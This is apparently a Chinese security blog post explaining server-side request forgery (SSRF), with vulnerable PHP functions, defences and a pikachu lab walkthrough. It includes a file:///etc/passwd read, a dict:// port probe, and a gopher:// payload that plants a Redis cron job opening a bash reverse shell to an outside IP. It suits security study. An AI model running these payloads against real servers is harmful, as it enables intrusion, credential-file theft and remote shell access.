SSRF漏洞

已于 2022-04-19 16:03:28 修改
阅读量990 收藏
点赞数 1
分类专栏: 漏洞 文章标签: web安全
于 2022-04-18 23:21:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ad12456/article/details/124262039
版权

SSRF例子

SSRF (Server-Side Request Forgery):服务器端请求伪造
先举一个例子:
对于这个网站(一个写的小例子,部署在phpstudy中访问的,这是为了理解)
在这里插入图片描述它的参数url,我们通过它传入一个文件地址或者网址。它通过服务器的一个文件进行请求访问,并传回给浏览器。在这里插入图片描述
还可以读取文件。在这里插入图片描述
上面的网站代码用php写的,用到了curl(): 获取网页资源——爬虫、webservice——获取接口数据、FTP——下载文件 。 用它要将php.ini 中的extension=php_curl.dll打开。
还有其他函数也可能导致的SSRF漏洞。

函数作用
curl_exec()执行 cURL 会话
file_get_contents()将整个文件读入一个字符串
fsockopen()打开一个网络连接或者一个Unix套
接字连接

curl 其他协议:

协议
file查看文件curl -v 'file:///etc/passwd
dict探测端口http://localhost/ssrf/ssrf1.php?url=dict://127.0.0.1:3306
gopher反弹shellcurl -v’gopher://127.0.0.1:6379/_3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a/1 * * * * bash -i >&/dev/tcp/192.168.142.135/44440>&1%0a%0a%0a%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a1%0d%0a$4%0d%0asave%0d%0a1%0d%0a$4%0d%0aquit%0d%0

dict协议:用于搭建在线字典服务
gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代

SSRF定义

SSRF Server-Side Request Forgery服务器端请求伪造:是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

危害

  • 扫描资产
  • 获取敏感xinx
  • 攻击内网服务器(饶过防火墙)
  • 访问大文件,照成溢出
  • 通过Redis写出WebShell或建立反弹连接

如何发现

1.爬取地址
2.查看是否请求了其他资源

也可以搜索关键字 :share、wap、url、link、src、source、target、u、
3g、display、sourceURL、imageURL、domain

工具

SSRF-Tedting、SSRFmap 等 在github上下载源码去使用。

防御

1、禁用协议
2、限制请求端口
3、设置URL白名单
4、过滤返回信息
5、统一错误信息

靶场

pikachu
在这里插入图片描述

点开,看到url中请求了一个地址,那我们能利用它去获取其他文件,

在这里插入图片描述
试一试,可以访问到百度。那它也是可以访问其他网站,包括恶意网站。
在这里插入图片描述
那我们还可以试试用伪协议去访问本地文件。可以读取到。
在这里插入图片描述

? Persevere?
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF漏洞详解
热门推荐
qq_48904485的博客
03-22 1万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
SSRF漏洞实战
yuan_boss的博客
09-04 1317
服务器会根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“请求伪造”发生在服务器端,那这个漏洞就叫做“服务器端请求伪造”,英文名字Server Side Request Forgery,简称SSRF。
SSRF 漏洞笔记
qq_32812063的博客
11-25 1080
SSRF
SSRF漏洞笔记
weixin_42695055的博客
02-08 302
SSRF:(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造特殊形成的请求,并且由指定服务器端发起恶意请求的一个安全漏洞。 由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。
SSRF漏洞复现
m0_57485346的博客
03-15 1058
ssrf漏洞复现
Weblogic SSRF漏洞
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
ssrf漏洞复现
m0_55631425的博客
03-27 2694
漏洞复现 cd /usr/local ls cd vulhub-master cd weblogic cd ssrf docker-compose up -d ifconfig查询下本机IP 访问http://192.168.106.139:7001/uddiexplorer/SearchPublicRegistries.jsp ,出现以下界面 这里可能会遇到访问不上的情况,发现物理机无法ping通虚拟机,虚拟机能ping通物理机 只需给VMnet8的虚拟网卡禁用再启用就行 历经千辛万苦终于进来了 1、
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
104-web漏洞挖掘之SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
31-浅谈SSRF漏洞1
08-03
1、获取web应用可达服务器服务的banner信息以及收集内网web应用的指纹识别, 2、攻击运行在内网的系统或应用程序,获取内网各系统弱口令进行内网漫游、对有
ssrf-lab:探索SSRF漏洞的实验室
05-22
实验室 探索SSRF漏洞的实验室 10月4日的实验室位于/ ctf目录中:-)
web安全学习笔记(13)
m0_58875569的博客
05-09 294
记一下第20-21节课的内容。PHP+HTML套模板做一个企业官网、BurpSuite安装与原理+VPN衔接
<网络安全>《81 微课堂<安全产品微简介(1)>》
Else 的博客
05-09 179
产品 简要 防火墙 网络区域边界上部署,主要作用是隔离阻断。 安全审计 一般包括网络日志的分析、网络流量的监控和用户行为的跟踪等。发现网络中的潜在问题和漏洞。 入侵检测IDS 实时监控和检测网络中的异常活动和入侵行为。 入侵防御IPS 防病毒软件、防火墙的补充,一般结合IDS使用。可以阻断网络资料传输。 网关 网络互连设备。网间数据传递和转换。可以包含VPN、流控、上网行为审计等。 靶场 虚拟化技术,模拟真实的网络架构、系统设备、业务流程,实现学习、研究、竞赛、演习。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 1462
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全实训Day16
Yisitelz的博客
04-26 2394
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
医疗行业面临的网络安全挑战及应对策略
运维有小邓
05-06 321
ADManager Plus是一款企业级身份治理和管理解决方案,不仅可以帮助您的组织通过HIPAA规定,还可以通过GDPR、FISMA、SOX、PCI DSS等其他合规要求。除了150多种报告之外,该解决方案还提供了专属于AD和Microsoft 365环境的身份风险评估报告,并提供缓解网络风险的措施。
网络安全零信任学习2:零信任概念
最新发布
jackyrongvip的专栏
05-09 374
(4)零信任的访问代理具备网络隐身能力,可以提高对抗DDoS攻击。(2)设备不可信:网络中的设备不都是公司管控的设备,未经检测。(3)系统不可信:漏洞是修不完的,系统一定存在未修复的漏洞。b)持续评估访问中的信任等级,根据环境和信任等级变化,实时动。(2)零信任不仅是一种思路,更是一系列技术的合集。(3)零信任架构不是抛弃传统的安全边界。(5)零信任架构与传统的安全产品之间不是泾渭分明的。(2)零信任的访问代理可能造成性能延迟。(3)零信任的访问代理会保护整个网络,但它本身会成为攻击的焦。
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
SSRF (Server-Side Request Forgery) 漏洞是一种常见的 Web 安全漏洞,攻击者通过构造恶意的请求,从而使服务器发起非预期的请求,可能导致敏感信息泄露、服务器受到攻击等后果。 在内网渗透中,SSRF 漏洞可以用来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值